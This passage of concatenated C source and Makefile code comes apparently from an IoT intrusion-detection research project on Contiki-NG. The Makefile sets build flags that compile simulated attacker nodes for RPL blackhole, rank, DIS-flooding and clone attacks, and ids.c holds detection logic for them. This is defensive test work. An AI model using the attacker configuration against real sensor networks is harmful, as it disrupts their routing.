($(IDS_CLIENT),2)\n$(info 'MALICIOUS')\n\tDEFINES+=IDS_SERVER=0 RPL_CONF_DEFAULT_INSTANCE=0\n\tDEFINES+=IDS_CLIENT=0\n\tDEFINES+=MALICIOUS=1\n\t# DEFINES+=RPL_CONF_DIS_INTERVAL=30*CLOCK_SECOND\n\tDEFINES+=MAL_DIS=0\n\tDEFINES+=MAL_BLACKHOLE=1 MAL_RANK=1\n# \tBUILD_DIR_CONFIG=malicious\nendif\n\n#For clone only or malicious and clone\nudp-client-clone:\nifeq ($(IDS_CLIENT),3)\n$(info 'CLONE ONLY')\n\tDEFINES+=IDS_SERVER=0\n\tDEFINES+=IDS_CLIENT=0\n\tDEFINES+=MALICIOUS=0\n\tDEFINES+=CLONE_ATTACK=1\n\tDEFINES+=MAL_DIS=0\n# \tBUILD_DIR_CONFIG=clone_only\nendif\n\nifeq ($(IDS_CLIENT),4)\n$(info 'MALICIOUS and CLONE')\n\tDEFINES+=IDS_SERVER=0\n\tDEFINES+=IDS_CLIENT=0\n\tDEFINES+=MALICIOUS=1\n\tDEFINES+=CLONE_ATTACK=1\n\tDEFINES+=MAL_DIS=1\n\tDEFINES+=RPL_CONF_DIS_INTERVAL=0\n# \tBUILD_DIR_CONFIG=clone_malicious\nendif\n\n#defined packet_counters to give me stats for nbr and IDS\nudp-client:\nifeq ($(IDS_CLIENT),0)\n$(info 'NORMAL')\n\tDEFINES+=IDS_SERVER=0 RPL_CONF_DEFAULT_INSTANCE=0\n\tDEFINES+=IDS_CLIENT=0\n\tDEFINES+=IDS_OF=1\n\tDEFINES+=MALICIOUS=0\n\tDEFINES+=CLONE_ATTACK=0\n\tDEFINES+=LINK_STATS_CONF_PACKET_COUNTERS=1 LINK_STATS_CONF_ETX_FROM_PACKET_COUNT=1\n\tDEFINES+=UIP_CONF_STATISTICS=1\n\tMODULES=os/net/routing/ids-app \n# \tBUILD_DIR_CONFIG=normal\nendif\n\nCONTIKI=../..\n\nCONTIKI_WITH_IPV6 = 1\n\ninclude $(CONTIKI)/Makefile.include\n\n# all: $(CONTIKI_PROJECT)\n## enable packet counting\n"
},
{
"alpha_fraction": 0.5400213599205017,
"alphanum_fraction": 0.5602988004684448,
"avg_line_length": 21.309524536132812,
"blob_id": "b21147ee5cdcbae2866a6fe13b9547a58383f155",
"content_id": "edcec17dc025383b96ed509300c11ff9c07aa79a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 937,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 42,
"path": "/arch/platform/whitefield/command_ns_mop.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#define\t_COMMAND_NS_MOP_C_\n\n#include \"command.h\"\n\n#if RPL_WITH_NON_STORING\n\n#include \"net/rpl/rpl-ns.h\"\n\nint get_route_list(FILE *fp, char *buf, int buflen)\n{\n rpl_ns_node_t *r;\n char ipstr[128], parent[128];\n int n=0, wr_comma=0;\n uip_ipaddr_t ip;\n\n for(r = rpl_ns_node_head(); r != NULL;\n r = rpl_ns_node_next(r)) \n {\n rpl_ns_get_node_global_addr(&ip, r);\n uip_ipaddr_to_str(&ip, ipstr, sizeof(ipstr));\n rpl_ns_get_node_global_addr(&ip, r->parent);\n uip_ipaddr_to_str(&ip, parent, sizeof(parent));\n if(wr_comma) {\n ADD2BUF(fp, \",\");\n }\n wr_comma=1;\n ADD2BUF(fp, \"{ \\\"prefix\\\": \\\"%s\\\", \\\"pref_len\\\": \\\"%d\\\", \\\"parent\\\": \\\"%s\\\" }\\n\", \n ipstr, 128, parent);\n if(n > buflen-100) {\n n += snprintf(buf+n, buflen-n, \"[TRUNC]\");\n break;\n }\n }\n return n;\n}\n\nint cmd_rtsize(uint16_t id, char *buf, int buflen)\n{\n return snprintf(buf, buflen, \"%d\", uip_sr_num_nodes());\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.5534979701042175,
"alphanum_fraction": 0.5599279999732971,
"avg_line_length": 27.372262954711914,
"blob_id": "939c0ed184c66d9ff1f596514896da41219d408f",
"content_id": "4262e309e0b68ca0a73367151e8c800963b4de5c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3888,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 137,
"path": "/arch/platform/whitefield/dev/wfmac_driver.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#include \"os/net/mac/nullmac/nullmac.h\"\n#include \"os/net/ipv6/uip.h\"\n#include \"os/net/ipv6/tcpip.h\"\n#include \"net/packetbuf.h\"\n#include \"net/netstack.h\"\n#include \"lib/random.h\"\n\n#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include \"commline/commline.h\"\n\n/* Log configuration */\n#include \"sys/log.h\"\n#define LOG_MODULE \"wfmac\"\n#define LOG_LEVEL LOG_LEVEL_MAIN\n\nextern uint16_t gNodeID;\n\nmac_callback_t g_mac_sent_cb;\n/*---------------------------------------------------------------------------*/\nstatic void send_packet(mac_callback_t sent, void *ptr)\n{\n\tDEFINE_MBUF(mbuf);\n\n\tif(!g_mac_sent_cb && sent) {\n\t\tg_mac_sent_cb = sent;\n\t} else if(g_mac_sent_cb && sent != g_mac_sent_cb) {\n\t\tERROR(\"****** Didnt expect different MAC SENT CB ********\\n\");\n\t\t/*RJ: If this condn is hit means some additional code is required\n\t\tto manage the sent/ptr values ... have to maintain a queue and\n\t\tpush the sent/ptr in every unicast case, so that when ACK is \n\t\trcvd, the sent/ptr are appropriately retrieved from queue */\n\t\treturn;\n\t}\n\n\tmbuf->len = packetbuf_totlen();\n\tmemcpy(mbuf->buf, packetbuf_hdrptr(), packetbuf_totlen());\n\tmbuf->src_id = gNodeID;\n\tmbuf->dst_id = cl_get_longaddr2id((uint8_t*)packetbuf_addr(PACKETBUF_ADDR_RECEIVER));\n\tINFO(\"src:%0x dst:%0x len:%d\\n\", mbuf->src_id, mbuf->dst_id, mbuf->len);\n\tif(CL_SUCCESS != cl_sendto_q(MTYPE(AIRLINE, CL_MGR_ID), mbuf, mbuf->len + sizeof(msg_buf_t))) {\n\t\tmac_call_sent_callback(sent, ptr, MAC_TX_ERR_FATAL, 3);\n\t}\n}\n\nint get_tx_status(uint8_t wf_status, char *statstr, size_t len)\n{\n\tswitch(wf_status) {\n\t\tcase WF_STATUS_ACK_OK:\n\t\t\tsnprintf(statstr, len, \"ACK_OK\");\n\t\t\treturn MAC_TX_OK;\n\t\tcase WF_STATUS_NO_ACK:\n\t\t\tsnprintf(statstr, len, \"NO_ACK\");\n\t\t\treturn MAC_TX_NOACK;\n\t\tcase WF_STATUS_ERR:\n\t\t\tsnprintf(statstr, len, \"TX_ERR\");\n\t\t\treturn MAC_TX_ERR;\n\t\tdefault:\n\t\t\tsnprintf(statstr, len, \"TX_FATAL\");\n\t\t\treturn MAC_TX_ERR_FATAL;\n\t}\n\treturn 0;\n}\n\nvoid mac_handle_ack(msg_buf_t *mbuf)\n{\n\tchar statstr[32];\n\tint status;\n\n\tif(!g_mac_sent_cb) { \n\t\tERROR(\"How can mac sent cb is not set when ACK is rcvd!\\n\");\n\t\treturn;\n\t}\n\tstatus = get_tx_status(mbuf->info.ack.status, statstr, sizeof(statstr));\n\tINFO(\"ACK status:%s retries:%d\\n\", statstr, mbuf->info.ack.retries);\n\tmac_call_sent_callback(g_mac_sent_cb, NULL, status, mbuf->info.ack.retries);\n}\n\n/*---------------------------------------------------------------------------*/\nstatic void packet_input(void)\n{\n\tNETSTACK_NETWORK.input();\n}\n/*---------------------------------------------------------------------------*/\nstatic int on(void)\n{\n\treturn 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int off(void)\n{\n\treturn 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int max_payload(void)\n{\n int framer_hdrlen;\n radio_value_t max_radio_payload_len;\n radio_result_t res;\n\n framer_hdrlen = NETSTACK_FRAMER.length();\n\n res = NETSTACK_RADIO.get_value(RADIO_CONST_MAX_PAYLOAD_LEN,\n &max_radio_payload_len);\n\n if(res == RADIO_RESULT_NOT_SUPPORTED) {\n ERROR(\"Failed to retrieve max radio driver payload length\\n\");\n return 0;\n }\n\n if(framer_hdrlen < 0) {\n /* Framing failed, we assume the maximum header length */\n#define WFMAC_MAX_HDR 21 // copied from CSMA_MAC_MAX_HEADER\n framer_hdrlen = WFMAC_MAX_HDR;\n }\n\n return MIN(max_radio_payload_len, PACKETBUF_SIZE)\n - framer_hdrlen\n - LLSEC802154_PACKETBUF_MIC_LEN();\n}\n/*---------------------------------------------------------------------------*/\nstatic void init(void)\n{\n INFO(\"Initing wfmac_driver\\n\");\n}\n/*---------------------------------------------------------------------------*/\nconst struct mac_driver wfmac_driver = {\n\t\"wfmac\",\n\tinit,\n\tsend_packet,\n\tpacket_input,\n\ton,\n\toff,\n\tmax_payload,\n};\n/*---------------------------------------------------------------------------*/\n\n"
},
{
"alpha_fraction": 0.5032090544700623,
"alphanum_fraction": 0.5095038414001465,
"avg_line_length": 27.229965209960938,
"blob_id": "0b074214990e3f9d958175e8190fa2f5ec381ad3",
"content_id": "9af97eb5f6055bebabbb33a66a246ff829faeddd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 8102,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 287,
"path": "/arch/platform/whitefield/dev/wfradio_driver.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n\n#include \"contiki.h\"\n\n#include \"net/packetbuf.h\"\n#include \"net/netstack.h\"\n\n#include \"dev/radio.h\"\n#include \"wfradio_driver.h\"\n#include \"commline/commline.h\"\n\n/* Log configuration */\n#include \"sys/log.h\"\n#define LOG_MODULE \"wfradio\"\n#define LOG_LEVEL LOG_LEVEL_MAIN\n\nPROCESS(wfradio_process, \"whitefield radio process\");\n/*---------------------------------------------------------------------------*/\nstatic void\nset_send_on_cca(uint8_t enable)\n{\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset_frame_filtering(int enable)\n{\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset_auto_ack(int enable)\n{\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset_poll_mode(int enable)\n{\n}\n/*---------------------------------------------------------------------------*/\nvoid\nradio_set_channel(int channel)\n{\n}\n/*---------------------------------------------------------------------------*/\nvoid\nradio_set_txpower(unsigned char power)\n{\n}\n/*---------------------------------------------------------------------------*/\nint\nradio_signal_strength_last(void)\n{\n\treturn 1;\n}\n/*---------------------------------------------------------------------------*/\nint\nradio_signal_strength_current(void)\n{\n return 0;\n}\n/*---------------------------------------------------------------------------*/\nint\nradio_LQI(void)\n{\n return 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int\nradio_on(void)\n{\n INFO(\"turning ON whitefield radio\\n\");\n return 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int\nradio_off(void)\n{\n INFO(\"turning OFF whitefield radio\\n\");\n return 0;\n}\n\nextern void mac_handle_ack(msg_buf_t *mbuf);\nextern void sl_handle_cmd(msg_buf_t *mbuf);\n/*---------------------------------------------------------------------------*/\nextern uint16_t gNodeID;\nstatic int radio_read(void *inbuf, unsigned short bufsize)\n{\n\tint ret;\n\tlinkaddr_t addr;\n\tDEFINE_MBUF(mbuf);\n\n\tret = cl_recvfrom_q(MTYPE(STACKLINE, gNodeID), mbuf, sizeof(mbuf_buf), CL_FLAG_NOWAIT);\n\tif(mbuf->len == 0) {\n\t\treturn 0;\n\t}\n\tINFO(\"RECV ret:%d src:%x dst:%x len:%d flags:%x\\n\", \n\t\tret, mbuf->src_id, mbuf->dst_id, mbuf->len, mbuf->flags);\n\tif(mbuf->len > bufsize) {\n\t\tERROR(\"How can mbuflen(%d) be greater than bufsize:%d?!\\n\", mbuf->len, bufsize);\n\t\treturn 0;\n\t}\n\tif(mbuf->flags & MBUF_IS_CMD) {\n#if 1\n\t\t//Hack Alert!! Notice that the foll condn will never be true\n\t\t//This condition had to be added so that cmd_* function are linked in the \n\t\t//binary. Linker decides that cmd_* functions are never called from \n\t\t//any other place and optimizes out! But I need these functions to be \n\t\t//loaded dynamically using dlsym(). Using this check i sort of fool linker \n\t\t//into believing that the function is called, but the wrapping cond will \n\t\t//never be true.\n\t\tif(mbuf->len == 0xdead && mbuf->len == 0xc0de) {\n\t\t\textern int cmd_rtsize(uint16_t, char *, int);\n\t\t\tcmd_rtsize(0xbabe, NULL, 0xcafe);\n\t\t}\n#endif\n\t\tsl_handle_cmd(mbuf);\n\t\treturn 0;\n\t}\n\tmemcpy(inbuf, mbuf->buf, mbuf->len);\n\tcl_get_id2longaddr(mbuf->src_id, addr.u8, sizeof(addr.u8));\n\tpacketbuf_set_addr(PACKETBUF_ADDR_SENDER, &addr);\n\tcl_get_id2longaddr(mbuf->dst_id, addr.u8, sizeof(addr.u8));\n\tpacketbuf_set_addr(PACKETBUF_ADDR_RECEIVER, &addr);\n\tpacketbuf_set_attr(PACKETBUF_ATTR_RSSI, mbuf->info.sig.rssi);\n\tpacketbuf_set_attr(PACKETBUF_ATTR_LINK_QUALITY, mbuf->info.sig.lqi);\n\tif(mbuf->flags & MBUF_IS_ACK) {\n\t\tmac_handle_ack(mbuf);\n\t\treturn 0;\n\t}\n#if 0\n\tstatic int rcvd_cnt=0;\n\trcvd_cnt++;\n\tPRINT_HEX(mbuf->buf, mbuf->len, \"rcvd %d, len=%d\\n\", rcvd_cnt, mbuf->len);\n#endif\n\treturn mbuf->len;\n}\n/*---------------------------------------------------------------------------*/\nstatic int channel_clear(void)\n{\n\treturn 1;\n}\n/*---------------------------------------------------------------------------*/\nstatic int radio_send(const void *payload, unsigned short payload_len)\n{\n\treturn RADIO_TX_OK;\n}\n/*---------------------------------------------------------------------------*/\nstatic int prepare_packet(const void *data, unsigned short len)\n{\n\treturn len;\n}\n/*---------------------------------------------------------------------------*/\nstatic int transmit_packet(unsigned short len)\n{\n\tint ret = RADIO_TX_ERR;\n\treturn ret;\n}\n/*---------------------------------------------------------------------------*/\nstatic int receiving_packet(void)\n{\n\treturn 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int pending_packet(void)\n{\n\treturn 1;\n}\n/*---------------------------------------------------------------------------*/\nPROCESS_THREAD(wfradio_process, ev, data)\n{\n\tint len;\n\n\tPROCESS_BEGIN();\n\n\twhile(1) {\n\t\tPROCESS_YIELD_UNTIL(ev == PROCESS_EVENT_POLL);\n\t\tpacketbuf_clear();\n\t\tlen = radio_read(packetbuf_dataptr(), PACKETBUF_SIZE);\n\t\tif(len > 0) {\n\t\t\tpacketbuf_set_datalen(len);\n\t\t\tNETSTACK_MAC.input();\n\t\t}\n\t}\n\n\tPROCESS_END();\n}\n/*---------------------------------------------------------------------------*/\nstatic int init(void)\n{\n process_start(&wfradio_process, NULL);\n INFO(\"initing wfradio\\n\");\n\tif(cl_init(MTYPE(STACKLINE, gNodeID), CL_ATTACHQ)!=CL_SUCCESS) {\n\t\tERROR(\"commline init failed\\n\");\n\t\treturn 1;\n\t}\n\treturn 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic radio_result_t get_value(radio_param_t param, radio_value_t *value)\n{\n\tswitch(param) {\n\t\tcase RADIO_PARAM_RX_MODE:\n\t\t\t*value = 0;\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_TX_MODE:\n\t\t\t*value = 0;\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_LAST_RSSI:\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_LAST_LINK_QUALITY:\n\t\t\treturn RADIO_RESULT_OK;\n case RADIO_CONST_MAX_PAYLOAD_LEN:\n *value = (radio_value_t)125;\n return RADIO_RESULT_OK;\n\t\tdefault:\n\t\t\treturn RADIO_RESULT_NOT_SUPPORTED;\n\t}\n}\n/*---------------------------------------------------------------------------*/\nstatic radio_result_t set_value(radio_param_t param, radio_value_t value)\n{\n\tswitch(param) {\n\t\tcase RADIO_PARAM_RX_MODE:\n\t\t\tif(value & ~(RADIO_RX_MODE_ADDRESS_FILTER |\n\t\t\t\t\t\tRADIO_RX_MODE_AUTOACK | RADIO_RX_MODE_POLL_MODE)) {\n\t\t\t\treturn RADIO_RESULT_INVALID_VALUE;\n\t\t\t}\n\n\t\t\t/* Only disabling is acceptable for RADIO_RX_MODE_ADDRESS_FILTER */\n\t\t\tif ((value & RADIO_RX_MODE_ADDRESS_FILTER) != 0) {\n\t\t\t\treturn RADIO_RESULT_NOT_SUPPORTED;\n\t\t\t}\n\t\t\tset_frame_filtering((value & RADIO_RX_MODE_ADDRESS_FILTER) != 0);\n\n\t\t\t/* Only disabling is acceptable for RADIO_RX_MODE_AUTOACK */\n\t\t\tif ((value & RADIO_RX_MODE_ADDRESS_FILTER) != 0) {\n\t\t\t\treturn RADIO_RESULT_NOT_SUPPORTED;\n\t\t\t}\n\t\t\tset_auto_ack((value & RADIO_RX_MODE_AUTOACK) != 0);\n\n\t\t\tset_poll_mode((value & RADIO_RX_MODE_POLL_MODE) != 0);\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_TX_MODE:\n\t\t\tif(value & ~(RADIO_TX_MODE_SEND_ON_CCA)) {\n\t\t\t\treturn RADIO_RESULT_INVALID_VALUE;\n\t\t\t}\n\t\t\tset_send_on_cca((value & RADIO_TX_MODE_SEND_ON_CCA) != 0);\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_CHANNEL:\n\t\t\tif(value < 11 || value > 26) {\n\t\t\t\treturn RADIO_RESULT_INVALID_VALUE;\n\t\t\t}\n\t\t\tradio_set_channel(value);\n\t\t\treturn RADIO_RESULT_OK;\n\t\tdefault:\n\t\t\treturn RADIO_RESULT_NOT_SUPPORTED;\n\t}\n}\n/*---------------------------------------------------------------------------*/\nstatic radio_result_t get_object(radio_param_t param, void *dest, size_t size)\n{\n\treturn RADIO_RESULT_NOT_SUPPORTED;\n}\n/*---------------------------------------------------------------------------*/\nstatic radio_result_t set_object(radio_param_t param, const void *src, size_t size)\n{\n\treturn RADIO_RESULT_NOT_SUPPORTED;\n}\n/*---------------------------------------------------------------------------*/\nconst struct radio_driver wfradio_driver =\n{\n\tinit,\n\tprepare_packet,\n\ttransmit_packet,\n\tradio_send,\n\tradio_read,\n\tchannel_clear,\n\treceiving_packet,\n\tpending_packet,\n\tradio_on,\n\tradio_off,\n\tget_value,\n\tset_value,\n\tget_object,\n\tset_object\n};\n/*---------------------------------------------------------------------------*/\n"
},
{
"alpha_fraction": 0.5537499785423279,
"alphanum_fraction": 0.5787500143051147,
"avg_line_length": 20.62162208557129,
"blob_id": "747c39ddef403173f306230649447a306d928dcd",
"content_id": "5705bc42a2bb40dafbf99bfd78a5fa99def7c45d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 800,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 37,
"path": "/arch/platform/whitefield/command_storing_mop.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#define\t_COMMAND_SM_MOP_C_\n\n#include \"command.h\"\n\n#if !RPL_WITH_NON_STORING\n\nint get_route_list(FILE *fp, char *buf, int buflen)\n{\n\tuip_ds6_route_t *r;\n\tchar ipstr[128], nhop[128];\n\tint n=0, wr_comma=0;\n\n\tfor(r = uip_ds6_route_head();\n\t\t\tr != NULL;\n\t\t\tr = uip_ds6_route_next(r)) {\n\t\tuip_ipaddr_to_str(&r->ipaddr, ipstr, sizeof(ipstr));\n\t\tuip_ipaddr_to_str(uip_ds6_route_nexthop(r), nhop, sizeof(nhop));\n\t\tif(wr_comma) {\n\t\t\tADD2BUF(fp, \",\");\n\t\t}\n wr_comma=1;\n\t\tADD2BUF(fp, \"{ \\\"prefix\\\": \\\"%s\\\", \\\"pref_len\\\": \\\"%d\\\", \\\"next_hop\\\": \\\"%s\\\" }\\n\", \n\t\t\tipstr, r->length, nhop);\n\t\tif(n > buflen-100) {\n\t\t\tn += snprintf(buf+n, buflen-n, \"[TRUNC]\");\n\t\t\tbreak;\n\t\t}\n\t}\n\treturn n;\n}\n\nint cmd_rtsize(uint16_t id, char *buf, int buflen)\n{\n\treturn snprintf(buf, buflen, \"%d\", uip_sr_num_nodes());\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.5547306537628174,
"alphanum_fraction": 0.5711326003074646,
"avg_line_length": 28.105527877807617,
"blob_id": "801d50bc0663c02c0a2443f9387f82209fbbddef",
"content_id": "89cb7f3970305025f06b36c39250b4a5e0957052",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5792,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 199,
"path": "/examples/rpl-udp/udp-client-ids.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#include \"contiki.h\"\n#include \"net/routing/routing.h\"\n#include \"random.h\"\n#include \"net/netstack.h\"\n#include \"net/ipv6/simple-udp.h\"\n\n// #include \"packetbuf.h\"\n#include \"net/routing/rpl-lite/rpl.h\"\n#include \"net/routing/rpl-lite/rpl-icmp6.h\"\n#include \"sys/log.h\"\n\n#include \"ids.h\"\n#define LOG_MODULE \"IDS\"\n#define LOG_LEVEL LOG_LEVEL_INFO\n\n#define WITH_SERVER_REPLY 1\n#define UDP_CLIENT_PORT\t8765\n#define UDP_SERVER_PORT\t5678\n\n#define SEND_INTERVAL\t\t (60 * CLOCK_SECOND)\n\nstatic struct simple_udp_connection udp_conn;\n\n static struct ctimer time_to_reset;\n static void reset_stats(void *ptr);\n// static struct etimer time_sniff;\n\n/*---------------------------------------------------------------------------*/\nPROCESS(udp_client_process, \"IDS client\");\nAUTOSTART_PROCESSES(&udp_client_process);\n/*---------------------------------------------------------------------------*/\nstatic void\nudp_rx_callback(struct simple_udp_connection *c,\n const uip_ipaddr_t *sender_addr,\n uint16_t sender_port,\n const uip_ipaddr_t *receiver_addr,\n uint16_t receiver_port,\n const uint8_t *data,\n uint16_t datalen)\n{\n\n LOG_INFO(\"Received response '%.*s' from \", datalen, (char *) data);\n LOG_INFO_6ADDR(sender_addr);\n#if LLSEC802154_CONF_ENABLED\n LOG_INFO_(\" LLSEC LV:%d\", uipbuf_get_attr(UIPBUF_ATTR_LLSEC_LEVEL));\n#endif\n LOG_INFO_(\"\\n\");\n\n}\n\nstatic void reset_stats(void *ptr){\n uint8_t i=0;\n for (i=0;i<NODES_NUM_CL;i++){\n nodes[i].address=0;\n nodes[i].counterMsg=0;\n nodes[i].counterDIS=0;\n nodes[i].intervals=999;\n nodes[i].timestamp=0;\n nodes[i].spoof_suspicious=0;\n nodes[i].last_avg_rss=0;\n }\n \n LOG_INFO(\"RST tmp\\n\");\n // while (i<NODES_NUM_CL){\n \n // // if (tmp_ip_senders[i]!=0){\n // // LOG_INFO(\"Clone %d\\n\",tmp_ip_senders[i]);\n // // }\n // tmp_ip_senders[i].from=0;\n // for (i=0;i<tmp_ip_senders[i].index;i++){\n // // tmp_ip_senders[i].dest[i]=0;\n // tmp_ip_senders[i].count_fw_packets[i]=0; \n // }\n\n // i++;\n \n // }\n // ids_output_to_benign();\n\n ctimer_reset(&time_to_reset);\n}\n\nstatic void reset_nbr_tbl(){\n struct fw_stats *stats;\n stats = nbr_table_head(nbr_fw_stats);\n while(stats != NULL) {\n nbr_table_remove(nbr_fw_stats, stats);\n stats = nbr_table_next(nbr_fw_stats, stats);\n }\n}\n\n/*---------------------------------------------------------------------------*/\nPROCESS_THREAD(udp_client_process, ev, data)\n{\n static struct etimer periodic_timer;\n static unsigned count;\n // static char str[32];\n uip_ipaddr_t dest_ipaddr;\n static unsigned i=0;\n // extern fw_stats tmp_ip_senders[NODES_NUM_CL];\n\n PROCESS_BEGIN();\n\n// //Initialize array with nodes\n// uint8_t i=0;\n// for (i=0;i<30;i++){\n// nodes[i].address=0;\n// nodes[i].counterMsg=0;\n// nodes[i].counterDIS=0;\n// nodes[i].intervals=999;\n// nodes[i].timestamp=0;\n// }\n\n // radio_value_t radio_rx_mode;\n\n //Uncomment below to reduce dupl packets\n// radio_value_t radio_rx_mode;\n/* Entering promiscuous mode so that the radio accepts all frames */\n// NETSTACK_RADIO.get_value(RADIO_PARAM_RX_MODE, &radio_rx_mode);\n// LOG_INFO(\"val:%d\",radio_rx_mode);\n// NETSTACK_RADIO.set_value(RADIO_PARAM_RX_MODE, radio_rx_mode &(~RADIO_RX_MODE_AUTOACK));\n// if (NETSTACK_RADIO.set_value(RADIO_PARAM_RX_MODE, ~RADIO_RX_MODE_ADDRESS_FILTER | ~RADIO_RX_MODE_AUTOACK) != RADIO_RESULT_OK){\n// LOG_INFO(\"Error enable promiscious\\n\");\n// }\n// radio_rx_mode &= ~RADIO_RX_MODE_ADDRESS_FILTER;\n\n// NETSTACK_RADIO.set_value(RADIO_PARAM_RX_MODE, radio_rx_mode);\n /* Entering promiscuous mode so that the radio accepts the enhanced ACK */\n\n /* Initialize UDP connection */\n simple_udp_register(&udp_conn, UDP_CLIENT_PORT, NULL,\n UDP_SERVER_PORT, udp_rx_callback);\n\n //Used in uip6.c, starts detecting after 1 minute\n etimer_set(&time_sniff, (60*CLOCK_SECOND));\n etimer_set(&periodic_timer, (60*CLOCK_SECOND)); \n\n // etimer_set(&packet_fw_timer, (60*CLOCK_SECOND)); //send metrics to nodes\n ctimer_set(&time_to_reset,180*CLOCK_SECOND,reset_stats,NULL);\n\n // nbr_table_register(nbr_fw_stats, NULL);\n\ni=0;\n while(1) {\n // PROCESS_YIELD();\n // PROCESS_WAIT_EVENT();\n\n // if (etimer_expired(&packet_fw_timer)){\n // ids_output_to_benign(&dest_ipaddr);\n // etimer_set(&packet_fw_timer,60*CLOCK_SECOND);\n // // goto drop;\n // }\n\n PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&periodic_timer));\n \n \n etimer_reset(&periodic_timer);\n\n if (NETSTACK_ROUTING.node_is_reachable() && NETSTACK_ROUTING.node_has_joined() && NETSTACK_ROUTING.get_root_ipaddr(&dest_ipaddr)) {\n // NETSTACK_ROUTING.get_root_ipaddr(&dest_ipaddr);\n /* Send to DAG root */\n LOG_INFO(\"Check IDS.Attempt: %u \\n\", count);\n \n if (i%3==0){ //3 minute report\n // i=0;\n LOG_INFO(\"fromids\\n\");\n ids_output_to_benign(&dest_ipaddr);\n if (i%15==0 || i%16==0){ //reset every 15 minutes\n reset_nbr_tbl();\n i=0;\n }\n }\n // LOG_INFO_6ADDR(&dest_ipaddr);\n // LOG_INFO_(\"\\n\");\n // snprintf(str, sizeof(str), \"hello %d\", count);\n // simple_udp_sendto(&udp_conn, str, strlen(str), &dest_ipaddr);\n // uip_ipaddr_t addr2;\n \n dest_ipaddr.u8[sizeof(dest_ipaddr.u8) - 1]=1;\n ids_output(&dest_ipaddr);\n\n count++; \n \n \n } else {\n LOG_INFO(\"Not reachable yet\\n\");\n }\n\n i+=1;\n \n\n /* Add some jitter */\n // etimer_set(&periodic_timer, SEND_INTERVAL\n // - CLOCK_SECOND + (random_rand() % (2 * CLOCK_SECOND)));\n }\n\n PROCESS_END();\n}\n/*---------------------------------------------------------------------------*/\n"
},
{
"alpha_fraction": 0.4828967750072479,
"alphanum_fraction": 0.4989214241504669,
"avg_line_length": 25.598360061645508,
"blob_id": "e32ff14c807db8bee423719c9d834304c25805b5",
"content_id": "5e5ca249661e70610c7ac594242e76cf4abf32fa",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3245,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 122,
"path": "/os/net/routing/ids-app/ids.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "\n//#include \"net/rpl/rpl-icmp6.c\"\n\n#include \"ids.h\"\n#include \"sys/log.h\"\n\n//void ids_output(uip_ipaddr_t *addr);\n\n// #if IDS_SERVER\n// #define NODES_NUM 5\n// #elif IDS_CLIENT\n// #define NODES_NUM_CL 30\n// #endifs\n\n#if IDS_SERVER == 1\nids_ctr_t nodes[NODES_NUM];\n\n#define LOG_MODULE \"IDS\"\n#define LOG_LEVEL LOG_LEVEL_INFO\n\nvoid checkNodes();\n// PROCESS(ids_process, \"Chk\");\n\nvoid checkNodes()\n{\n uint8_t j = 0;\n for (j = 0; j < NODES_NUM; j++) {\n // LOG_INFO(\"Running IDS %d %d\\n\",j,nodes[j].address);\n\n if (nodes[j].address > 0 && nodes[j].address != 1) {\n\n LOG_INFO(\"adr:%d %u disnum:%u %u t_in:%u bh:%d\\n\", j, (unsigned)nodes[j].address,\n (unsigned)nodes[j].counterDIS, (unsigned)nodes[j].counterMsg, (unsigned)nodes[j].intervals, nodes[j].blackhole_mal);\n\n //Check for BH nodes and reset\n if (nodes[j].blackhole_mal>2){\n LOG_INFO(\"BH Attacker:%d,%d\\n\", (unsigned)nodes[j].address,nodes[j].blackhole_mal);\n nodes[j].blackhole_mal=0;\n }\n\n //Changed the time interval\n if (nodes[j].intervals <= 20 && nodes[j].counterDIS >= 5) {\n uint8_t count = 0, c = 0;\n for (c = 0; c < DETECTORS_NUM; c++) {\n \n count += nodes[j].counterDetect[c];\n }\n // LOG_INFO(\"c:%d %d\\n\",count,nodes[j].detected);\n\n if (count >= 2 && nodes[j].detected == 1) {\n LOG_INFO(\"sure mal ID %u!\\n\", (unsigned)nodes[j].address);\n\n uint8_t k = 0;\n\n for (k = 0; k < DETECTORS_NUM; k++) 